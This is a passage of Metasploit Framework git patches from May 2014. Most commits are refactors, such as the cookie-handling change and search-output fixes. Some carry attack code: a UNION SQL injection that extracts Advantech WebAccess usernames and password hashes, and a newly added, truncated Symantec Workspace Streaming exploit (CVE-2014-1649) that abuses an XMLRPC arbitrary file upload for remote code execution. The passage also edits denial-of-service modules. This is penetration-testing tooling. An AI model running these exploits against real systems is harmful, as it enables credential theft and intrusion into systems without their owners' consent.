class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/ + if res and res.code == 302 and res.headers['Location'] =~ /index.do/ and res.get_cookies =~ /JSESSIONID=(.*);/ print_good("#{peer} - Login successful") session = $1 else diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index a885cb3901..6854cd78bb 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote }) # If we don't get a cookie, bail! - if res and res.headers['Set-Cookie'] =~ /(PHPVolunteerManagent=\w+);*/ + if res and res.get_cookies =~ /(PHPVolunteerManagent=\w+);*/ cookie = $1 vprint_status("#{peer} - Found cookie: #{cookie}") else diff --git a/modules/exploits/multi/http/phpldapadmin_query_engine.rb b/modules/exploits/multi/http/phpldapadmin_query_engine.rb index c6eeac426b..1315ed710e 100644 --- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb +++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb @@ -79,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => uri, }, 3) - if (res.nil? or not res.headers['Set-Cookie']) + if res.nil? or res.get_cookies.empty? print_error("Could not generate a valid session") return end - return res.headers['Set-Cookie'] + return res.get_cookies end def cleanup diff --git a/modules/exploits/multi/http/qdpm_upload_exec.rb b/modules/exploits/multi/http/qdpm_upload_exec.rb index 0478b23dd5..c9f5931858 100644 --- a/modules/exploits/multi/http/qdpm_upload_exec.rb +++ b/modules/exploits/multi/http/qdpm_upload_exec.rb @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote } }) - cookie = (res and res.headers['Set-Cookie'] =~ /qdpm\=.+\;/) ? res.headers['Set-Cookie'] : '' + cookie = (res and res.get_cookies =~ /qdpm\=.+\;/) ? res.get_cookies : '' return {} if cookie.empty? cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0] diff --git a/modules/exploits/multi/http/rails_secret_deserialization.rb b/modules/exploits/multi/http/rails_secret_deserialization.rb index 46751d2f1f..7803dd5414 100644 --- a/modules/exploits/multi/http/rails_secret_deserialization.rb +++ b/modules/exploits/multi/http/rails_secret_deserialization.rb @@ -233,8 +233,8 @@ class Metasploit3 < Msf::Exploit::Remote 'uri' => datastore['TARGETURI'] || "/", 'method' => datastore['HTTP_METHOD'], }, 25) - if res && res.headers['Set-Cookie'] - match = res.headers['Set-Cookie'].match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) + if res && !res.get_cookies.empty? + match = res.get_cookies.match(/([_A-Za-z0-9]+)=([A-Za-z0-9%]*)--([0-9A-Fa-f]+); /) end if match diff --git a/modules/exploits/multi/http/sflog_upload_exec.rb b/modules/exploits/multi/http/sflog_upload_exec.rb index 1e2cd51567..d8f6f00de9 100644 --- a/modules/exploits/multi/http/sflog_upload_exec.rb +++ b/modules/exploits/multi/http/sflog_upload_exec.rb @@ -86,8 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.headers['Set-Cookie'] =~ /PHPSESSID/ and res.body !~ /\<i\>Access denied\!\<\/i\>/ - return res.headers['Set-Cookie'] + if res and res.get_cookies.include?('PHPSESSID') and res.body !~ /\<i\>Access denied\!\<\/i\>/ + return res.get_cookies else return '' end diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb index d85302620b..92d4380c43 100644 --- a/modules/exploits/multi/http/sit_file_upload.rb +++ b/modules/exploits/multi/http/sit_file_upload.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote if (res and res.code == 302 and res.headers['Location'] =~ /main.php/) print_status("Successfully logged in as #{user}:#{pass}") - if (res.headers['Set-Cookie'] =~ /SiTsessionID/) and res.headers['Set-Cookie'].split("SiTsessionID")[-1] =~ /=(.*);/ + if (res.get_cookies =~ /SiTsessionID/) and res.get_cookies.split("SiTsessionID")[-1] =~ /=(.*);/ session = $1 print_status("Successfully retrieved cookie: #{session}") return session diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index 2725ba5f81..cae9a80878 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -124,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote uid = '' session_id_port = session_id = '' - if res and res.code == 200 and res.headers['Set-Cookie'] - res.headers['Set-Cookie'].split(';').each {|c| + if res and res.code == 200 and !res.get_cookies.empty? + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /cval/ cval = v.split('=')[1] @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote else session_id_port = '' session_id = '' - res.headers['Set-Cookie'].split(';').each {|c| + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /session_id/ session_id_port = v.split('=')[0] diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 0c710b83ac..35e5f85241 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote session_id_port = session_id = '' if res and res.code == 200 - res.headers['Set-Cookie'].split(';').each {|c| + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /cval/ cval = v.split('=')[1] @@ -236,7 +236,7 @@ class Metasploit3 < Msf::Exploit::Remote else session_id_port = '' session_id = '' - res.headers['Set-Cookie'].split(';').each {|c| + res.get_cookies.split(';').each {|c| c.split(',').each {|v| if v.split('=')[0] =~ /session_id/ session_id_port = v.split('=')[0] From c421b8e5121e9b42aeb1f3ed9479381a6f0b9d96 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Wed, 14 May 2014 01:24:29 -0500 Subject: [PATCH 309/853] Change if not to unless --- .../windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index c3595b637e..8a16697870 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -259,7 +259,7 @@ class Metasploit3 < Msf::Exploit::Remote # since we need to have credentials for this vuln, we just login and run a query # to get the version information version = mssql_query_version - if not version + unless version return Exploit::CheckCode::Safe end print_status("@@version returned:\n\t" + version) From cbb84e854ca35f66b5b199a63fdedfc52b1d4e9d Mon Sep 17 00:00:00 2001 From: Karmanovskii <fnsnic@gmail.com> Date: Wed, 14 May 2014 14:56:40 +0400 Subject: [PATCH 310/853] Update mybb_get_type_db.rb 14.05.2014 Eliminated notes jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 143 +++++++++---------- 1 file changed, 69 insertions(+), 74 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index ad1e413cab..a61c1166d1 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -12,27 +12,19 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + Determine the database in the forum. + This affects versions <= 1.6.12 }, 'Author' => [ - #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii <fnsnic[at]gmail.com>'#Discovery and Metasploit Module + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii <fnsnic[at]gmail.com>'#Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 13 2014')) register_options( @@ -43,78 +35,81 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_cgi({ + 'uri' => uri, + 'method' => 'GET',}) + if req.nil? + print_error("Failed to retrieve webpage.") + return Exploit::CheckCode::Unknown + end + if req + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? - end + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end - #Check Web-Server - _version_server = res['Server'] - if _version_server - _version_server = " Server Version: #{_version_server}".ljust(40) - else - _version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end end def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) + response = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") + print_error("Failed to retrieve webpage.") + return end #Resolve response From 5b3bb8fb3b25e6e8358fa97af5b7f9865ee3efd8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 14 May 2014 09:00:13 -0500 Subject: [PATCH 311/853] Fix @FireFart's review --- .../advantech_webaccess_dbvisitor_sqli.rb | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 1d6617fd25..fc0b0b772a 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary 'data' => xml }) - unless res and res.code == 200 and res.body.to_s =~ /#{mark}/ + unless res && res.code == 200 && res.body && res.body.include?(mark) return nil end @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary def parse_users(xml, mark) doc = Document.new(xml) - strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string") + strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text) strings_length = strings.length unless strings_length > 1 @@ -110,13 +110,13 @@ class Metasploit3 < Msf::Auxiliary i = 0 strings.each do |result| - next if result.text == mark + next if result == mark if i < (strings_length / 3) - @users.push(result.text) + @users.push(result) elsif i < (strings_length / 3) * 2 - @passwords.push(result.text) + @passwords.push(result) else - @passwords2.push(result.text) + @passwords2.push(result) end i = i + 1 end @@ -126,13 +126,14 @@ class Metasploit3 < Msf::Auxiliary def run print_status("#{peer} - Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) + rand = Rex::Text.rand_text_numeric(2) # While installing I can only configure an Access backend, but # according to documentation other backends are supported. This # injection should be compatible, hopefully, with most backends. injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " - injection << "union all select UserName from BAUser where 1=1 " - injection << "union all select Password from BAUser where 1=1 " - injection << "union all select Password2 from BAUser where 1=1 " + injection << "union all select UserName from BAUser where #{rand}=#{rand} " + injection << "union all select Password from BAUser where #{rand}=#{rand} " + injection << "union all select Password2 from BAUser where #{rand}=#{rand} " injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" data = do_sqli(injection, mark) @@ -150,12 +151,13 @@ class Metasploit3 < Msf::Auxiliary if @users.empty? print_error("#{peer} - Users not found") + return else print_good("#{peer} - #{@users.length} users found!") end users_table = Rex::Ui::Text::Table.new( - 'Header' => 'vBulletin Users', + 'Header' => 'Advantech WebAccess Users', 'Ident' => 1, 'Columns' => ['Username', 'Password Hash', 'Password Hash 2'] ) From bb6201d66d229e0b964cd264820eb4ebf8288cf8 Mon Sep 17 00:00:00 2001 From: nstarke <starke.nicholas@gmail.com> Date: Wed, 14 May 2014 15:51:42 +0000 Subject: [PATCH 312/853] Fixing nil bug and making format constant MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The date format has been moved into a constant variable. Certain modules do not have a disclosure_date. For example, ‘checkvm’. This necessitated checking disclosure_date for nil before attempting a format conversion. Also, there was an additional location in core.rb that needed the formatting / nil check added. Specs were also updated appropriately. --- lib/msf/ui/console/command_dispatcher/core.rb | 8 +++++--- spec/lib/msf/ui/command_dispatcher/core_spec.rb | 2 +- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index d9aa5976ce..fc6ff9c35c 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -97,6 +97,8 @@ class Core # mode. DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ] + # Constant for disclosure date formatting in search functions + DISCLOSURE_DATE_FORMAT = "%Y-%m-%d" # Returns the list of commands supported by this command dispatcher def commands { @@ -1488,7 +1490,7 @@ class Core next if not o if not o.search_filter(match) - tbl << [ o.fullname, o.disclosure_date.strftime("%Y-%m-%d"), o.rank_to_s, o.name ] + tbl << [ o.fullname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), o.rank_to_s, o.name ] end end end @@ -1503,7 +1505,7 @@ class Core def search_modules_sql(search_string) tbl = generate_module_table("Matching Modules") framework.db.search_modules(search_string).each do |o| - tbl << [ o.fullname, o.disclosure_date.strftime("%Y-%m-%d"), RankingName[o.rank].to_s, o.name ] + tbl << [ o.fullname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), RankingName[o.rank].to_s, o.name ] end print_line(tbl.to_s) end @@ -3239,7 +3241,7 @@ class Core end end if (opts == nil or show == true) - tbl << [ refname, o.disclosure_date||"", o.rank_to_s, o.name ] + tbl << [ refname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), o.rank_to_s, o.name ] end end end diff --git a/spec/lib/msf/ui/command_dispatcher/core_spec.rb b/spec/lib/msf/ui/command_dispatcher/core_spec.rb index 69693eb5b8..f83188c8cf 100644 --- a/spec/lib/msf/ui/command_dispatcher/core_spec.rb +++ b/spec/lib/msf/ui/command_dispatcher/core_spec.rb @@ -82,7 +82,7 @@ describe Msf::Ui::Console::CommandDispatcher::Core do end it 'should have disclosure date in second column' do - cell(printed_table, 0, 1).should include(module_detail.disclosure_date.to_s) + cell(printed_table, 0, 1).should include(module_detail.disclosure_date.strftime("%Y-%m-%d")) end it 'should have rank name in third column' do From dc57e31be1d72a30c6357e904250d4eeb1d1d0ee Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Wed, 14 May 2014 15:03:10 -0500 Subject: [PATCH 313/853] Aux modules don't respect Rank anyway --- modules/auxiliary/dos/hp/data_protector_rds.rb | 1 - modules/auxiliary/dos/tcp/junos_tcp_opt.rb | 3 --- modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb | 1 - 3 files changed, 5 deletions(-) diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index d5bd75f748..47699d7fb3 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb @@ -6,7 +6,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - Rank = ManualRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index 5118638174..d13a07f95e 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -10,9 +10,6 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos - # The whole point is to cause a router crash. - Rank = ManualRanking - def initialize super( 'Name' => 'Juniper JunOS Malformed TCP Option', diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index 01ad7774b4..3a52efa1a7 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -4,7 +4,6 @@ ## class Metasploit3 < Msf::Auxiliary - Rank = ManualRanking include Msf::Exploit::Remote::Udp #include Msf::Exploit::Remote::SMB From 340956f2944360630d4a8f5c4ab28fd1f54304f5 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Wed, 14 May 2014 15:28:07 -0500 Subject: [PATCH 314/853] Add a newline after DISCLOSURE_DATE_FORMAT --- lib/msf/ui/console/command_dispatcher/core.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index fc6ff9c35c..71e2800b2b 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -99,6 +99,7 @@ class Core # Constant for disclosure date formatting in search functions DISCLOSURE_DATE_FORMAT = "%Y-%m-%d" + # Returns the list of commands supported by this command dispatcher def commands { From b85403ab8fe88c6c026fbda65fe962ce8436c0d3 Mon Sep 17 00:00:00 2001 From: nstarke <starke.nicholas@gmail.com> Date: Thu, 15 May 2014 16:05:47 +0000 Subject: [PATCH 315/853] Revert "POST module duplicate search results" This reverts commit 0bca3a2d54aaa63cd798cc41b4f4d97f00951708. --- .../post/meterpreter/ui/console/command_dispatcher/core.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index b0d16da36d..6766ce7e7f 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -542,8 +542,9 @@ class Console::CommandDispatcher::Core # fall back to using the scripting interface. if (msf_loaded? and mod = client.framework.modules.create(script_name)) original_mod = mod + reloaded_mod = client.framework.modules.reload_module(original_mod) - unless original_mod + unless reloaded_mod error = client.framework.modules.module_load_error_by_path[original_mod.file_path] print_error("Failed to reload module: #{error}") @@ -551,7 +552,7 @@ class Console::CommandDispatcher::Core end opts = (args + [ "SESSION=#{client.sid}" ]).join(',') - original_mod.run_simple( + reloaded_mod.run_simple( #'RunAsJob' => true, 'LocalInput' => shell.input, 'LocalOutput' => shell.output, From 048aebbdf22b650746734a6f064ab0ee8a2b64af Mon Sep 17 00:00:00 2001 From: nstarke <starke.nicholas@gmail.com> Date: Thu, 15 May 2014 17:52:11 +0000 Subject: [PATCH 316/853] Search Result Uniqueness MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit SeeRM #8754 Cast the results of the query to an array and perform the uniq function passing a block which provides uniqueness based on the return value, which in this instance is ‘fullname’ This was done because the uniq function in AREL cannot take a specific field for uniqueness, and the sophistication of the query make grouping nearly impossible. Initial testing showed negligible speed difference to the user. --- lib/msf/core/db_manager.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 52d3eac6d5..bc38515141 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -678,7 +678,7 @@ class DBManager union.or(condition) } - query = query.where(unioned_conditions).uniq + query = query.where(unioned_conditions).to_a.uniq { |m| m.fullname } end query From 472f029576b117112baeeed169d45635495eeaa5 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 15 May 2014 13:27:37 -0500 Subject: [PATCH 317/853] Fix random bug when workstation_name is < 6 chars When the local workstation name is less than 6 characters, remote authentication against a Windows 2008r2 WinRM service always fails. This doesn't seem to affect authentication against IIS's negotiate implementation. --- lib/rex/proto/http/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index d29e677839..b8efa19929 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -480,7 +480,7 @@ class Client opts['headers']||= {} ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+6) domain_name = self.config['domain'] b64_blob = Rex::Text::encode_base64( From 1b68abe95595256c2bc8f7fbe8fcb8d408f68d8d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Thu, 15 May 2014 13:41:52 -0500 Subject: [PATCH 318/853] Add module for ZDI-14-127 --- .../symantec_workspace_streaming_exec.rb | 356 ++++++++++++++++++ 1 file changed, 356 insertions(+) create mode 100644 modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb new file mode 100644 index 0000000000..9e77e808f0 --- /dev/null +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -0,0 +1,356 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Symantec Workspace Streaming Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in Symantec Workspace Streaming. The + vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the + as_agent.exe service, which allows to upload arbitrary files under the server root. + This module abuses the auto deploy feature at the JBoss as_ste.exe's instance in order + to achieve remote code execution. This module has been tested successfully on Symantec + Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single + machine deployment, and also at the backend role in a multiple machines deployment + }, + 'Author' => + [ + 'rgod <rgod[at]autistici.org>', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-1649'], + ['BID', '67189'], + ['ZDI', '14-127'], + ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00'] + ], + 'Privileged' => true, + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 12 2014')) + + register_options( + [ + Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file) + OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy) + ], self.class) + end + + def send_xml_rpc_request(xml) + res = send_request_cgi( + { + 'uri' => normalize_uri("/", "xmlrpc"), + 'method' => 'POST', + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => xml + }) + + res + end + + def build_soap_get_file(file_path) + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.getFile" + + params = xml.root.add_element("params") + + param_server_root = params.add_element("param") + value_server_root = param_server_root.add_element("value") + value_server_root.text = "*AWESE" + + param_file_type = params.add_element("param") + value_file_type = param_file_type.add_element("value") + type_file_type = value_file_type.add_element("i4") + type_file_type.text = "0" # build path from the server root directory + + param_file_name = params.add_element("param") + value_file_name = param_file_name.add_element("value") + value_file_name.text = file_path + + param_file_binary = params.add_element("param") + value_file_binary = param_file_binary.add_element("value") + type_file_binary = value_file_binary.add_element("boolean") + type_file_binary.text = "0" + + xml << XMLDecl.new("1.0", "UTF-8") + + xml.to_s + end + + def build_soap_put_file(file) + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.putFile" + + params = xml.root.add_element("params") + + param_server_root = params.add_element("param") + value_server_root = param_server_root.add_element("value") + value_server_root.text = "*AWESE" + + param_file_type = params.add_element("param") + value_file_type = param_file_type.add_element("value") + type_file_type = value_file_type.add_element("i4") + type_file_type.text = "0" # build path from the server root directory + + param_file = params.add_element("param") + value_file = param_file.add_element("value") + type_value_file = value_file.add_element("ex:serializable") + type_value_file.text = file + + xml << XMLDecl.new("1.0", "UTF-8") + + xml.to_s + end + + def build_soap_check_put + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.putFile" + xml.root.add_element("params") + xml << XMLDecl.new("1.0", "UTF-8") + xml.to_s + end + + def parse_method_response(xml) + doc = Document.new(xml) + file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable") + + unless file.nil? + file = Rex::Text.decode_base64(file.text) + end + + file + end + + def get_file(path) + xml_call = build_soap_get_file(path) + file = nil + + res = send_xml_rpc_request(xml_call) + + if res && res.code == 200 && res.body + file = parse_method_response(res.body.to_s) + end + + file + end + + def put_file(file) + result = nil + xml_call = build_soap_put_file(file) + + res = 